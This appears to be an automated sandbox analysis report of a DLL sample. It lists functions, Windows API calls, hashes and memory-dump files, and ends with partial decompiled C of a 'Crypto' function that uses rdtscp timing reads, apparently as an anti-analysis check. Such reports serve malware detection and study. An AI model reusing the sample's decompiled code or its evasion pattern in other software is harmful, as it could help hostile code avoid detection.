API ID: CounterQuery$CloseOpenPathRemoveValidate
String ID:
API String ID: 698537007-0
Opcode ID: 420da8b4a023acf31e852126cdaf124e61d79db36ff2bea84f4e4bfc6c36a4b1
Instruction ID: d4a38a1bed72f4ed9b8df7f5b60e5aa12f449292f7562361c7661ff43c0180c2
Opcode Fuzzy Hash: 420da8b4a023acf31e852126cdaf124e61d79db36ff2bea84f4e4bfc6c36a4b1
Instruction Fuzzy Hash: ED518F71900258EBDB20CF24C844BDAB7B4FF55394F00819AE568AB294D775BAE5CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 6F184C40, Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6F184C7C
std::_Lockit::_Lockit.LIBCPMT ref: 6F184C9E
std::_Lockit::~_Lockit.LIBCPMT ref: 6F184CBE
std::_Facet_Register.LIBCPMT ref: 6F184D8F
std::_Lockit::~_Lockit.LIBCPMT ref: 6F184DAF

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 8905499d73aa7555f5a629ad9bf04742e80c53df245682e63c299cda079a6870
Instruction ID: c91b2ea83f5c70ea63bd09388a688739e288d1346878e849dbf52f69d300cbc0
Opcode Fuzzy Hash: 8905499d73aa7555f5a629ad9bf04742e80c53df245682e63c299cda079a6870
Instruction Fuzzy Hash: 5151A871A04215CBDB11CF98C640B9EB7F8FF557A4F10425AD826BB280DB74BA65CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6F1ADD03, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6F1ADD0C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F1ADD2F

Part of subcall function 6F1A9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F198F9C,00000105,000000FF,24448D6F,00000000,?,6F181687,?,00000103,000000FF), ref: 6F1A9C04

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6F1ADD55
_free.LIBCMT ref: 6F1ADD68
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F1ADD77

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: b88f10e7d68f0eaa0aed1b504ca480d41365a23d8b8e0df99a92c30d50183779
Instruction ID: 4fa11dd49af09ec4c711583bee4bfd53795ef22ee2a115e3185ddec9d6d54212
Opcode Fuzzy Hash: b88f10e7d68f0eaa0aed1b504ca480d41365a23d8b8e0df99a92c30d50183779
Instruction Fuzzy Hash: E5017576601F59BF271155765C8CDBB397EEEC3EE43110169BD24C7184DA639C2181B0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AA3E2, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,6F1A6995,?,6F1A642D,6F1A9BBE,6F1A6995,?,6F1A731A,000000FF,000000FF), ref: 6F1AA3E7
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6F1A731A,000000FF,000000FF), ref: 6F1AA40D
_free.LIBCMT ref: 6F1AA44D
_free.LIBCMT ref: 6F1AA480
SetLastError.KERNEL32(00000000,000000FF), ref: 6F1AA48D

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: df030ce05c0ee1df0b6c276879c3e6a419982961141f06711496be94f96dffb7
Instruction ID: 32971fc557748bdc8c59b639efa6b13eff3c346945ce3efe6e220cd99fc50846
Opcode Fuzzy Hash: df030ce05c0ee1df0b6c276879c3e6a419982961141f06711496be94f96dffb7
Instruction Fuzzy Hash: 0911A93E144B00EAD7015A399C4CE6A3B69ABA27F47194319F438D61C4EB27E9319120

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B4978, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6F1B4990

Part of subcall function 6F1A9B98: HeapFree.KERNEL32(00000000,00000000,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BAE
Part of subcall function 6F1A9B98: GetLastError.KERNEL32(6F1A6995,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BC0

_free.LIBCMT ref: 6F1B49A2
_free.LIBCMT ref: 6F1B49B4
_free.LIBCMT ref: 6F1B49C6
_free.LIBCMT ref: 6F1B49D8

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 05f9638aad2ce348fa2f5e027d679e52190fb5db85cb95292bb1555f36ab9f75
Instruction ID: 32d1404446e3b5b163f0e7e6558655925c91b631fc2ab2a7d709632c8d3cac39
Opcode Fuzzy Hash: 05f9638aad2ce348fa2f5e027d679e52190fb5db85cb95292bb1555f36ab9f75
Instruction Fuzzy Hash: CEF04F31400B0DDB8A10DE58D490C8737DEBA146E03D1880AE069DB544C736F8B086A4

Uniqueness

Uniqueness Score: -1.00%

Function 6F1A6AD4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6F1A6B17, 6F1A6B1E, 6F1A6B52

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: a71713beb0110dca589e03759998f1af1fbbe8b3bade38e4b1b52720de9df056
Instruction ID: 9fc1c2c65318383fc164284dc4c96f8d48d0fe4ccbdf5e75f55bea13cb771d9c
Opcode Fuzzy Hash: a71713beb0110dca589e03759998f1af1fbbe8b3bade38e4b1b52720de9df056
Instruction Fuzzy Hash: 2D418279A0061CAFDB11DF9D898099FBBBCEF977A0B11416AE804E7240D773AA60C750

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AA5BB, Relevance: 6.3, APIs: 4, Instructions: 316COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6F1AA642

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: cae96cd944f24bfe251b0d126a4b103d3cc5a52edf7e0cf0203c8768d0cc22b6
Instruction ID: 8d79d5beb973964109bbda699abdf45ce6201e48ac14382c95b86a4ced958362
Opcode Fuzzy Hash: cae96cd944f24bfe251b0d126a4b103d3cc5a52edf7e0cf0203c8768d0cc22b6
Instruction Fuzzy Hash: 60B16976D45346DFE712CF68C8507AEBBB0EF217D4F1542AAD5409B281C33AAD62CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F185A30, Relevance: 6.1, APIs: 4, Instructions: 134clipboardwindowCOMMON

Download Yara Rule

APIs

GetOpenClipboardWindow.USER32(00000000,?,00000000,6F186431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6F185A3C
CloseClipboard.USER32 ref: 6F185A73
GetMenuCheckMarkDimensions.USER32 ref: 6F185B30
IsSystemResumeAutomatic.KERNEL32 ref: 6F185BA0

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$AutomaticCheckCloseDimensionsMarkMenuOpenResumeSystemWindow
String ID:
API String ID: 2155751611-0
Opcode ID: 0cae6e901b9fa6913f2e114bcbd786c37c5c959a59ed5aa3c53d15199e59f442
Instruction ID: 37d6de6336f669d83525c1c5408243f48ee66e2f9c533366cc6348ea31f7e111
Opcode Fuzzy Hash: 0cae6e901b9fa6913f2e114bcbd786c37c5c959a59ed5aa3c53d15199e59f442
Instruction Fuzzy Hash: EE41DC31914B418AC302CE3986D011BFBF6FFF66E4F54975EF452A6151FB30A8A58A82

Uniqueness

Uniqueness Score: -1.00%

Function 6F188FB0, Relevance: 6.1, APIs: 4, Instructions: 121COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 6F188FE1

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 05a7ec267e4b3df888bd576579bf89e21d90ed884ce03a98ada8606ca36bc8eb
Instruction ID: 3beced3632229978a659670ebd5e2279cea2d22935a183380a025e643c894b7f
Opcode Fuzzy Hash: 05a7ec267e4b3df888bd576579bf89e21d90ed884ce03a98ada8606ca36bc8eb
Instruction Fuzzy Hash: F531FB32B082159B9F08CD6DE59556EB7E5EF547F0710826FEC25CB244EB32E960CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AF32A, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(24448D6F,00000000,?,00000002,00000000,00000000,00000000,00000000,?,24448D6F,00000001,00000002,?,00000001,00000000,?), ref: 6F1AF377
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6F1AF400
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6F1AF412
__freea.LIBCMT ref: 6F1AF41B

Part of subcall function 6F1A9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F198F9C,00000105,000000FF,24448D6F,00000000,?,6F181687,?,00000103,000000FF), ref: 6F1A9C04

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 7b8c5f0e1cedea33d771ef073ea93d5ee29c8177b7a5a13d198998ea1bde07c5
Instruction ID: c908ef7bf4a5ce8eb14fb09d3dcee8aef30c9184ef20325aefc3ce2f6d910261
Opcode Fuzzy Hash: 7b8c5f0e1cedea33d771ef073ea93d5ee29c8177b7a5a13d198998ea1bde07c5
Instruction Fuzzy Hash: F531C176A1071AAFDF148F64CC84DEE3BA5EF50790F054269EC24DB180E736E965CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F188E70, Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 6F188ECE
SysAllocString.OLEAUT32(?), ref: 6F188F39
_com_issue_error.COMSUPP ref: 6F188F75
_com_issue_error.COMSUPP ref: 6F188F7F

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: da23d15d7b612ce8bf7aa01639b2b891c875ec31f075a4f20421045accb1b029
Instruction ID: c6c02b2c63ddaf44f8edcd0de7859f50aade3ad305947cf03a16cfb97c6cfdc6
Opcode Fuzzy Hash: da23d15d7b612ce8bf7aa01639b2b891c875ec31f075a4f20421045accb1b029
Instruction Fuzzy Hash: 8231B671A04755DBE7209F69CA84B46B7E8EF21BB4F20466AE834E7680D774F4608B90

Uniqueness

Uniqueness Score: -1.00%

Function 6F188D60, Relevance: 6.1, APIs: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 6F188DC0
_com_issue_error.COMSUPP ref: 6F188DFC
_com_issue_error.COMSUPP ref: 6F188E06
SysFreeString.OLEAUT32(-00000001), ref: 6F188E34

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: 832641063cfac77c9d3911fce65b6d8920d3bd0e06461c3889ba046111810d3f
Instruction ID: c0b5ba9f7b4543eecabffcddc9526467730fc7829d5ec156878aba72206d73b3
Opcode Fuzzy Hash: 832641063cfac77c9d3911fce65b6d8920d3bd0e06461c3889ba046111810d3f
Instruction Fuzzy Hash: 9D31A271905B15DBD7208F59D904B97BBE8EF11BB4F10462AE8359B280E7B5A460CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1932C0, Relevance: 6.1, APIs: 4, Instructions: 75threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6F1CFAA4), ref: 6F1932CC
GetCurrentThreadId.KERNEL32 ref: 6F1932DC
LeaveCriticalSection.KERNEL32(6F1CFAA4), ref: 6F19330C
SetWindowLongW.USER32 ref: 6F19335F

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
String ID:
API String ID: 3550545212-0
Opcode ID: 78db119625ea3467043fb9ec89430c19cf626bcfae1fbcb736f36d3460eb9669
Instruction ID: ce4db208d31a5609d55105accb9d37ad79fa174aca4c0f4b96360359eeab6e78
Opcode Fuzzy Hash: 78db119625ea3467043fb9ec89430c19cf626bcfae1fbcb736f36d3460eb9669
Instruction Fuzzy Hash: 5121A132A44615AF87108F66D84581BBB79FF857F0705452EE81DDB640DB31E931CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6F1A7468, Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 6F1A74CC: _free.LIBCMT ref: 6F1A74EC

_free.LIBCMT ref: 6F1A7482

Part of subcall function 6F1A9B98: HeapFree.KERNEL32(00000000,00000000,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BAE
Part of subcall function 6F1A9B98: GetLastError.KERNEL32(6F1A6995,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BC0

_free.LIBCMT ref: 6F1A7495
_free.LIBCMT ref: 6F1A74A6
_free.LIBCMT ref: 6F1A74B7

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7df798bac5073ceb106aeb7c125623ca7ab6b3b319867d773c3ec74fe60c34d8
Instruction ID: 09cc3303a3f37f4daaae79b0f582466f3faf4607e378373f51f24bd6ba03bec7
Opcode Fuzzy Hash: 7df798bac5073ceb106aeb7c125623ca7ab6b3b319867d773c3ec74fe60c34d8
Instruction Fuzzy Hash: 35F03976822B58AABF016F24D800CDA3B79EB166F6350010AE408BA252DB3325B5CA81

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B560B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6F1B5866,?,00000050,?,?,?,?,?), ref: 6F1B56E6

Strings

OCP, xrefs: 6F1B565F
ACP, xrefs: 6F1B5629

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 633e0caaa117a8eb1659b2d7c8f59ec54760dc5250f1d4193a442189a7f0f802
Instruction ID: 1d5421310269eaf9edd329757c36324d2a7d72f910d7a2982c7b154b4dbcc8e6
Opcode Fuzzy Hash: 633e0caaa117a8eb1659b2d7c8f59ec54760dc5250f1d4193a442189a7f0f802
Instruction Fuzzy Hash: DB21F5A2A45104E6E7148B6CC901BC773AAAF64BE4F53852DE915DB24CF732FE20C390

Uniqueness

Uniqueness Score: -1.00%

Function 6F197FF4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,6F197876,00000001,00000004,6F18224A,00000000,?,6F181D57,6F1D14C0,6F185700,6F1D14C4,?,6F18224A,00000004,00000001), ref: 6F198078

Strings

ios_base::failbit set, xrefs: 6F197FF7

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: ios_base::failbit set
API String ID: 1452528299-3924258884
Opcode ID: 2f8ceb5e3090cc8747f724e9ecde2f4263b8e6723f1f81d260a910e8cc31b90a
Instruction ID: fe3baef98a07dcaacb4e7476cf8e67c4b3c866fb042c242c64b3f769c1e6c998
Opcode Fuzzy Hash: 2f8ceb5e3090cc8747f724e9ecde2f4263b8e6723f1f81d260a910e8cc31b90a
Instruction Fuzzy Hash: 86118232248119EFDF029F65CC8459EBB65BF097F4B454039F9159A290DB72A8708BE0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AEAB3, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00B83220), ref: 6F1AEB49
GetLastError.KERNEL32 ref: 6F1AEB57
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6F1AEBB2

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 1c9e8fe0849df92831957cebb4c8d5fd6a3920610bbe09425649335e3db0bccc
Instruction ID: 9901c6afdec38299a561a71be617183b1b56c959f259c4e45e74e46b380723ca
Opcode Fuzzy Hash: 1c9e8fe0849df92831957cebb4c8d5fd6a3920610bbe09425649335e3db0bccc
Instruction Fuzzy Hash: BA412C38604705EFDB118F6AC884BAA7BB4EF123A0F114159E8699B1D0D733AB61C760

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6780 Parent PID: 6668 rundll32.exeCOMMON

Executed Functions

Function 6F186620, Relevance: 80.7, APIs: 44, Strings: 1, Instructions: 1995
COMMONCrypto

Download Yara Rule

C-Code - Quality: 19%

			E6F186620(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				void* _v28;
				signed char _v36;
				intOrPtr* _v40;
				void* _v44;
				signed char _v48;
				signed int _v52;
				signed int _v60;
				char _v61;
				signed int _v68;
				signed int* _v72;
				signed int _v76;
				signed char _v80;
				signed int _v88;
				signed char _v92;
				intOrPtr* _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v112;
				signed int _v113;
				short _v120;
				signed int _v128;
				signed char _v136;
				signed int _v144;
				signed short* _v152;
				intOrPtr _v156;
				signed char _v160;
				intOrPtr* _v188;
				signed int _v200;
				signed int _v236;
				signed char _v240;
				intOrPtr _v244;
				signed char _v268;
				signed int _v284;
				intOrPtr _v288;
				intOrPtr _v296;
				intOrPtr* _v312;
				signed int _v316;
				signed int _v320;
				intOrPtr _v332;
				intOrPtr _v412;
				char _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v440;
				char _v444;
				intOrPtr* _v448;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t427;
				signed int _t428;
				intOrPtr* _t430;
				signed char _t434;
				signed int _t441;
				signed int _t453;
				intOrPtr* _t455;
				signed char _t456;
				intOrPtr _t461;
				signed int _t462;
				short _t464;
				void* _t465;
				intOrPtr* _t468;
				signed int _t471;
				void* _t479;
				signed char _t480;
				signed char _t481;
				signed char _t483;
				signed int _t486;
				signed int _t498;
				void* _t501;
				int _t503;
				void* _t504;
				void* _t505;
				void* _t509;
				void* _t510;
				void* _t511;
				void* _t512;
				void* _t513;
				void* _t517;
				signed char _t520;
				signed char _t521;
				void* _t524;
				void* _t528;
				signed int* _t531;
				void* _t533;
				signed char _t543;
				void* _t544;
				signed int _t545;
				char _t555;
				signed char _t557;
				void* _t559;
				void* _t560;
				void* _t562;
				void* _t563;
				void* _t565;
				void* _t568;
				void* _t569;
				intOrPtr _t580;
				void* _t582;
				signed char _t583;
				signed int _t585;
				signed int _t589;
				signed char _t592;
				signed char _t595;
				signed char _t596;
				signed char _t601;
				void* _t608;
				void* _t609;
				signed int _t615;
				signed int _t617;
				signed char _t618;
				signed char _t623;
				signed char _t626;
				void* _t628;
				signed char _t631;
				long _t632;
				signed char _t640;
				signed char _t652;
				void* _t654;
				void* _t655;
				void* _t656;
				signed int _t658;
				signed int _t659;
				void* _t661;
				void* _t665;
				void* _t668;
				signed char _t670;
				signed char _t671;
				void* _t674;
				intOrPtr _t678;
				signed char _t679;
				signed char _t680;
				signed int _t684;
				signed int _t685;
				void* _t691;
				void* _t695;
				signed int* _t697;
				signed int _t707;
				signed int _t709;
				signed int _t713;
				signed int _t714;
				signed int _t718;
				signed int _t719;
				signed int _t729;
				signed int _t739;
				char* _t748;
				signed char _t749;
				signed char _t750;
				long _t772;
				signed short* _t774;
				intOrPtr* _t775;
				signed int _t776;
				intOrPtr _t797;
				intOrPtr _t798;
				signed int _t802;
				signed char _t808;
				void* _t814;
				signed int _t815;
				signed int _t819;
				void* _t821;
				signed int _t822;
				signed int _t823;
				signed int _t827;
				intOrPtr* _t829;
				void* _t838;
				signed int _t841;
				intOrPtr* _t842;
				signed int _t843;
				intOrPtr* _t844;
				signed int _t845;
				void* _t848;
				intOrPtr* _t850;
				signed int _t851;
				unsigned int _t853;
				signed char _t854;
				intOrPtr _t856;
				signed int _t857;
				signed int _t858;
				intOrPtr* _t859;
				signed char _t860;
				signed int _t864;
				signed short _t865;
				signed int _t866;
				void* _t868;
				signed short* _t870;
				void* _t871;
				signed char _t872;
				void* _t873;
				intOrPtr* _t874;
				signed int _t877;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				intOrPtr* _t882;
				signed int _t884;
				void* _t886;
				intOrPtr* _t887;
				void* _t888;
				signed int _t889;
				intOrPtr* _t891;
				signed char _t893;
				signed short* _t894;
				unsigned short _t896;
				signed int _t898;
				signed int _t900;
				signed int _t902;
				signed int* _t904;
				signed int _t905;
				signed char _t906;
				signed int _t907;
				intOrPtr* _t909;
				signed int _t912;
				void* _t913;
				intOrPtr _t914;

				_t674 = __ecx;
				_push(0xffffffff);
				_push(E6F1B93D0);
				_push( *[fs:0x0]);
				_t914 = _t913 - 0x1b0;
				_t420 =  *0x6f1cf008; // 0x1e3bcbb0
				_t421 = _t420 ^ _t912;
				_v24 = _t421;
				_push(__esi);
				_push(_t421);
				_t422 =  &_v16;
				 *[fs:0x0] = _t422;
				_v20 = _t914;
				asm("movups xmm0, [ebp+0x8]");
				asm("movups [ebp-0x1bc], xmm0");
				asm("movups xmm0, [ebp+0x18]");
				asm("movups [ebp-0x1ac], xmm0");
				asm("movups xmm0, [ebp+0x28]");
				asm("movups [ebp-0x19c], xmm0");
				asm("rdtscp");
				_v28 = __ecx;
				if(__edx != 0 || _t422 > 0x989680) {
					_t841 = 0xc2869da;
				} else {
					asm("rdtscp");
					_v28 = __ecx;
					_t841 = _t422;
				}
				asm("rdtscp");
				_v28 = _t674;
				_t427 = E6F1B8A60(_t422 * 0x85d6, 0 + (_t422 * 0x85d6 >> 0x20), 0x5f, 0);
				asm("movd xmm0, edi");
				_t428 = _t427 + 3;
				asm("cvtdq2ps xmm0, xmm0");
				_t877 = _t428;
				_v112 = _t428;
				_v60 = _t877;
				_v288 = _t877;
				_v156 = _t877;
				asm("movss [ebp-0x1c], xmm0");
				asm("movss [ebp-0x24], xmm0");
				asm("xorps xmm0, xmm0");
				asm("movsd [ebp-0xd4], xmm0");
				asm("movsd [ebp-0x170], xmm0");
				asm("movsd xmm0, [0x6f1c9698]");
				asm("movsd [ebp-0xdc], xmm0");
				asm("movsd xmm0, [0x6f1c9558]");
				asm("movsd [ebp-0xac], xmm0");
				asm("movsd [ebp-0xe4], xmm0");
